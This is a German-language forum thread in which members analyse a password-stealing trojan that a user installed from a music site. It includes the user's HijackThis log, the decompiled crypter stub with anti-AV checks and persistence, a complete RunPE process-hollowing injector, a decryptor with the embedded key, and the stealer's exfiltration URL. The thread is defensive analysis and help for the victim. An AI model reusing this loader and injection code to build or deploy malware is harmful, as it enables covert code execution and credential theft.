Viren, Trojaner & Malware

*Decryptor* · 18.02.2011, 00:26

okay scheinbar kann man nichma mehr seiner lieblings music seite vertrauen

jedenfalls heut mit adminrechten ausgeführt, is ja normal bei installationen, hab mich über die bin files gewundert die nur als deko da waren

ich hab win7 64bit

http://www.virustotal.com/file-scan/...ce9-1297987147

Code:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 01:20:05, on 18.02.2011
Platform: Windows 7  (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16722)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
C:\Program Files (x86)\Trillian\trillian.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\DivX\DivX Plus Web Player\DDMService.exe
C:\Program Files (x86)\xchat\xchat.exe
C:\Program Files (x86)\Last.fm\LastFM.exe
C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files (x86)\FlashFXP 4\FlashFXP.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
C:\Users\****\Downloads\HiJackThis204.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: Use the DivX Plus Web Player to watch web videos with less interruptions and smoother playback on supported sites - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\Microsoft Office\Office14\GROOVEEX.DLL
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\Microsoft Office\Office14\URLREDIR.DLL
O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O2 - BHO: Microsoft-Webtestaufzeichnung 10.0-Hilfsprogramm - {DDA57003-0068-4ed2-9D32-4D1EC707D94D} - C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll
O3 - Toolbar: Foxit Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - Startup: Trillian.lnk = C:\Program Files (x86)\Trillian\trillian.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\Microsoft Office\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\Microsoft Office\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\Microsoft Office\Office14\ONBttnIE.dll/105
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\Microsoft Office\OFFICE11\REFIEBAR.DLL
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O10 - Unknown file in Winsock LSP: c:\windows\mfnspstd32.dll
O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\Skype4COM.dll
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Ati External Event Utility - Unknown owner - C:\Windows\system32\Ati2evxx.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
O23 - Service: LogMeIn Hamachi 2.0 Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: HASP License Manager (hasplms) - Unknown owner - C:\Windows\system32\hasplms.exe (file missing)
O23 - Service: HTTP Debugger (HTTPDebugger) - MadeForNet.com - C:\Program Files (x86)\HTTP Debugger Pro\mfnsvc.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: KMService - Unknown owner - C:\Windows\system32\srvany.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft Limited - C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWService.exe
O23 - Service: Process Monitor (LVPrcS64) - Logitech Inc. - C:\Program Files\Common Files\Logishrd\LVMVFM\LVPrcSrv.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files (x86)\McAfee Security Scan\2.0.181\McCHSvc.exe
O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 32-bit 32-bit (mi-raysat_3dsmax2011_32) - Unknown owner - C:\Program Files (x86)\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_32server.exe
O23 - Service: mental ray 3.8 Satellite for Autodesk 3ds Max Design 2011 64-bit 64-bit (mi-raysat_3dsmax2011_64) - Unknown owner - C:\Program Files\Autodesk\3ds Max Design 2011\mentalimages\satellite\raysat_3dsmax2011_64server.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NIHardwareService - Native Instruments GmbH - C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
O23 - Service: PACE License Services (PaceLicenseDServices) - PACE Anti-Piracy, Inc. - C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Sage Registry Service (Registry) - Sage KHK Software - C:\Program Files (x86)\Common Files\Sage KHK Shared\REGISTRY.EXE
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11312 bytes

besagte exe
http://www.xup.in/dl,40417503/Setup.exe/

*dreamax* · 18.02.2011, 04:59

VM an -> Wireshark an -> Setup.exe ausfuehren -> Geaenderte Dateien anschauen -> Wireshark log anschauen -> [was ist es was tut es] (ein debugger waere auch ganz praktisch, benoetigt aber vorkentnisse -> codeanalyse)

mfg

PS: Ich wuerde meinen Accountnamen aus dem Log entfernen..
PS2: Der Autor ist uebrigens bei hackforums.net angemeldet, jedenfalls klaut er da seinen Code zusammen..

//edit: Log sieht sauber aus.

Code Injection into avcenter.exe
Autostart via Registry SOFTWARE\Microsoft\Windows\CurrentVersion\Run (\temp.exe?)
"Crypted" via 10$ BlackBloodCrypter2.2 und Base64^^
...

*Decryptor* · 18.02.2011, 07:30

Zitat:

Zitat von dreamax

VM an -> Wireshark an -> Setup.exe ausfuehren -> Geaenderte Dateien anschauen -> Wireshark log anschauen -> [was ist es was tut es] (ein debugger waere auch ganz praktisch, benoetigt aber vorkentnisse -> codeanalyse)

mfg

PS: Ich wuerde meinen Accountnamen aus dem Log entfernen..
PS2: Der Autor ist uebrigens bei hackforums.net angemeldet, jedenfalls klaut er da seinen Code zusammen..

//edit: Log sieht sauber aus.

Code Injection into avcenter.exe
Autostart via Registry SOFTWARE\Microsoft\Windows\CurrentVersion\Run (\temp.exe?)
"Crypted" via 10$ BlackBloodCrypter2.2 und Base64^^
...

hab keine temp.exe
laut olydbgkillt es erstma die avs, naja mal in der vm runen lassen, es hantiert mit 3 datein rum laut sandboxie

unter xp vm gehts nedma
vm win7 öffnet den explorer, hinterlässt nix im windir oder autostart

keine daten fließen,. grad mit wire gesnifft, crazy ding

**N0S** · 18.02.2011, 18:34

Da wurde ein Copy/Paste Kiddie Crypter verwendet... lohnt sich nicht wirklich Wireshark zu starten, guckt euch doch einfach den Sourcecode an:

Code:

public static void Main()
{
    ResourceManager manager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly());
    byte[] inArray = (byte[]) manager.GetObject("crypted");
    string newValue = manager.GetString("settings");
    BindedData = manager.GetString("bind");
    RunPE = manager.GetString("runpe");
    char ch = '%';
    string[] strArray = newValue.Split(new char[] { ch });
    string str8 = strArray[4];
    string str2 = strArray[5];
    string str = strArray[3];
    string str6 = strArray[11];
    string str4 = strArray[6];
    string str3 = strArray[10];
    string str5 = strArray[12];
    if (str3 == "1")
    {
        OnlineSub(); //checked ob internet an ist
    }
    if (str == "1")
    {
        Daanteys.Enable(); //anti av/vm/sandbox
    }
    if (str2 == "1")
    {
        Thread thread = new Thread(new ThreadStart(Stub.BindSub));
        thread.IsBackground = true;
        thread.Start();
    }
    if (str8 == "1")
    {
        AddStartUp();
    }
    RunPE = RunPE.Replace("%%CDATA%%", CD.format(Convert.ToBase64String(inArray))); //der eigentliche Schädling
    RunPE = RunPE.Replace("%%Settings%%", newValue);
    if (str5 == "DefBrw")
    {
        str5 = defaultbrowser();
    }
    RunPE = RunPE.Replace("%%INJECT%%", str5);
    Execute(RunPE); //im Speicher ausführen
    if (str4 == "1")
    {
        switch (strArray[7])
        {
            case "":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
                goto Label_023D;

            case "Exclamation":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Exclamation, strArray[9]);
                goto Label_023D;

            case "Critical":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Critical, strArray[9]);
                goto Label_023D;

            case "Question":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Question, strArray[9]);
                break;

            case "Information":
                Interaction.MsgBox(strArray[8], MsgBoxStyle.Information, strArray[9]);
                break;
        }
    }
Label_023D:
    if (str6 == "1")
    {
        MeltME(); //sich selber löschen
    }
}

Die Settings sind die folgenden:

Code:

9%AES%cFwmeodjIGLViDo%0%0%0%0%Critical%%%0%0%explorer.exe%

Die Methode, die das eigentlich schädliche Programm ausführt, wird on-the-fly compiled und der Source sieht so aus:

Code:

Imports System.Text
Imports System.Runtime.InteropServices
Imports System
Imports Microsoft.VisualBasic
Imports System.ComponentModel
Imports System.IO.Compression
Imports System.IO

Namespace Inject
Public Class RunPE

Public Shared Function DoStuff() As Boolean

Dim Setting As String = "%%Settings%%"

Dim FileSplit As Char = "%%BlackBloodCrypter2.2%%"

Dim SplitedData() as String = Setting.Split(FileSplit)

        Dim Password As String = SplitedData(2)

        Dim Encryption As String = SplitedData(1)

	    Dim CryptData As String = %%CDATA%%

		Dim InjectInto as String = "%%INJECT%%"
			
		If Environment.OSVersion.Platform.ToString.Contains("32") OrElse Environment.OSVersion.Platform.ToString.Contains("86") Then
            If Encryption = "RC4" Then
				InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
            ElseIf Encryption = "AES" Then
			    InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
            ElseIf Encryption = "DES" Then
                InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
            ElseIf Encryption = "RC2" Then
                InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
            ElseIf Encryption = "STR" Then
                InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
            ElseIf Encryption = "TDES" Then
                InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), InjectInto)
            End If
        Else
            If Encryption = "RC4" Then
                InjectPE(RC4(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
            ElseIf Encryption = "AES" Then
                InjectPE(AES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
            ElseIf Encryption = "DES" Then
                InjectPE(DES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
            ElseIf Encryption = "RC2" Then
                InjectPE(RC2_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
            ElseIf Encryption = "STR" Then
                InjectPE(Crypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
            ElseIf Encryption = "TDES" Then
                InjectPE(TDES_Decrypt(Convert.FromBase64String(CryptData), System.Text.Encoding.Default.GetBytes(Password)), Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") & "Microsoft.NET\Framework\v2.0.50727\vbc.exe")
            End If
        End If
Return True
End Function
   Public Shared Function AES_Decrypt(ByVal input As Byte(), ByVal pass As Byte()) As Byte()
        Dim AES As New System.Security.Cryptography.RijndaelManaged
        Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
        Dim decrypted() As Byte
        Try
            Dim hash(31) As Byte
            Dim temp As Byte() = Hash_AES.ComputeHash(pass)
            Array.Copy(temp, 0, hash, 0, 16)
            Array.Copy(temp, 0, hash, 15, 16)
            AES.Key = hash
            AES.Mode = Security.Cryptography.CipherMode.ECB
            Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
            Dim Buffer As Byte() = input
            decrypted = DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
            Return decrypted
        Catch ex As Exception
            Return Nothing
        End Try
    End Function
.....
    <DllImport("kernel32")> _
    Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
        ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    End Function
    <DllImport("kernel32")> _
    Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    End Function
    <DllImport("ntdll")> _
    Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
    End Function
    <DllImport("kernel32")> _
    Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
    End Function
    Declare Function usegfsuiefgseuf Lib "kernel32" Alias "SetThreadContext" (ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        <DllImport("kernel32")> _
    Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
    End Function
    <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
    Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
    End Function
    <DllImport("kernel32.dll", SetLastError:=True)> _
    Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
    End Function

    Public Shared Function InjectPE(ByVal bytes() as Byte, ByVal InjectInto as String) As Boolean
        Try
            Dim procAttr As IntPtr = IntPtr.Zero
            Dim processInfo As IntPtr() = New IntPtr(3) {}
            Dim startupInfo As Byte() = New Byte(67) {}

            Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
            Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
            Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))

            If CreateProcess(Nothing, New StringBuilder(InjectInto), procAttr, procAttr, False, 4, _
                procAttr, Nothing, startupInfo, processInfo) Then
                Dim ctxt As UInteger() = New UInteger(178) {}
                ctxt(0) = &H10002
                If GetThreadContext(processInfo(1), ctxt) Then
                    Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                    Dim buffer__1 As IntPtr = IntPtr.Zero
                    Dim bufferSize As New IntPtr(4)

                    Dim numRead As IntPtr = IntPtr.Zero

                    If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
                        Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
                        Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
                        Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)

                        Dim lpNumberOfBytesWritten As Integer

                        WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                        Dim num5 As Integer = num - 1
                        For i As Integer = 0 To num5
                            Dim dst As Integer() = New Integer(9) {}
                            Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
                            Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                            Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
														addr = New IntPtr(buffer2.Length)
                            size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                                                        WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                        Next
                        size = New IntPtr(ctxt(&H29) + 8L)
                        addr = New IntPtr(4)

                        WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                        ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
                        usegfsuiefgseuf(processInfo(1), ctxt)
                    End If
                End If
                ResumeThread(processInfo(1))
            End If
        Catch
            Return False
        End Try
        Return True
    End Function

Interessant ist es eben in welche exe es injected wird, sieht man aber gut im Quellcode...

Wie kommt man nun auf elegantem Wege an den Schädling? Ganz einfach, die entscheidende Methode (AES Decrypt) kopieren, in Visual Studio rein und die exe decrypten mit dem gegebenen Passwort...

Hmpf, für den eigentlichen Schädling hat es kein Platz mehr -> RR Post Zeichenlimit

*Decryptor* · 18.02.2011, 18:48

ich bin irgendwie grad zu blöd dafür, was macht/hat es gemacht es nu bzw wie werd ich es wieder los

**N0S** · 18.02.2011, 20:13

decrypt methode in C#:

Code:

       static void Main(string[] args)
        {
            string pathInput = @"C:\Users\Admin\Downloads\crypted";
            string pathOutput = @"C:\Users\Admin\Downloads\crypted.exe";
            string password = "cFwmeodjIGLViDo";

            BinaryReader b = new BinaryReader(File.Open(pathInput, FileMode.Open));
            byte[] buffer = b.ReadBytes((int)b.BaseStream.Length);
            b.Close();
            RijndaelManaged rj = new RijndaelManaged();
            MD5CryptoServiceProvider crp = new MD5CryptoServiceProvider();
            byte[] hash = crp.ComputeHash(Encoding.Default.GetBytes(password));
            byte[] hashpw = new byte[32];
            Array.Copy(hash, 0, hashpw, 0, 16);
            Array.Copy(hash, 0, hashpw, 15, 16);
            rj.Key = hashpw;
            rj.Mode = CipherMode.ECB;
            ICryptoTransform transform = rj.CreateDecryptor();
            byte[] decrypted = null;
            try
            {
                decrypted = transform.TransformFinalBlock(buffer, 0, buffer.Length);
            }
            catch (CryptographicException ex)
            {
                Console.WriteLine(ex.ToString());
                Console.Read();
            }
            BinaryWriter writeBinay = new BinaryWriter(new FileStream(pathOutput, FileMode.Create));
            writeBinay.Write(decrypted);
            writeBinay.Close();        
        }

decrypted exe virus total scan:
http://www.virustotal.com/file-scan/...aac-1298058394

Auf die schnelle würde ich sagen:
Da ist ein sehr guter Passwort Stealer (Baukasten!) drin. Die Daten werden an ein PHP Script geschickt:

Code:

http://46.182.124.42/index2.php

Zitat:

netname: RapidSpeeds
descr: RapidSpeeds Servers LTD
descr: www.rapidspeeds.com
remarks: Please send e-mail to "" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL

Der Stealer erkennt auch ob Wireshark läuft!

Nistet sich wohl nicht ins System ein, aber z.B. deine Firefox Passwörter sind nun beim Kiddie.

Such trotzdem mal deine Autostart Liste ab mit Autoruns von Sysinternals.

*Decryptor* · 18.02.2011, 20:19

ganz grose klasse

autostart is nix

**N0S** · 19.02.2011, 13:42

jo dann sollte dein System schon sauber sein.

Hier nochmal ne kurze Auflistung was es so klaut:
- FlashFXP/SmartFTP
- Opera/Firefox/Chrome/IE
- MSN/Trillian
- Steam

Die Liste ist nicht vollständig, besonders FlashFXP dürfte dich aber interessieren^^

*Decryptor* · 19.02.2011, 14:56

Zitat:

Zitat von N0S

jo dann sollte dein System schon sauber sein.

Hier nochmal ne kurze Auflistung was es so klaut:
- FlashFXP/SmartFTP
- Opera/Firefox/Chrome/IE
- MSN/Trillian
- Steam

Die Liste ist nicht vollständig, besonders FlashFXP dürfte dich aber interessieren^^

naja mit den ftp daten kanner nix anfangen
icq is schon geändert zumindest die uin wo ich das pw selbst weiß
trillian astra bietet ja nedma die option das pw zu ändern, toller service...

aber danke für die auflistung

18.02.2011, 04:59	# 2
dreamax Hellraiser Bewertung: Registriert seit: Oct 2005 Beiträge: 3.558 Power: 40	VM an -> Wireshark an -> Setup.exe ausfuehren -> Geaenderte Dateien anschauen -> Wireshark log anschauen -> [was ist es was tut es] (ein debugger waere auch ganz praktisch, benoetigt aber vorkentnisse -> codeanalyse) mfg PS: Ich wuerde meinen Accountnamen aus dem Log entfernen.. PS2: Der Autor ist uebrigens bei hackforums.net angemeldet, jedenfalls klaut er da seinen Code zusammen.. //edit: Log sieht sauber aus. Code Injection into avcenter.exe Autostart via Registry SOFTWARE\Microsoft\Windows\CurrentVersion\Run (\temp.exe?) "Crypted" via 10$ BlackBloodCrypter2.2 und Base64^^ ... € Linux / Unix / Windows - Hilfestellung / Installation / Management €

19.02.2011, 13:42	# 8
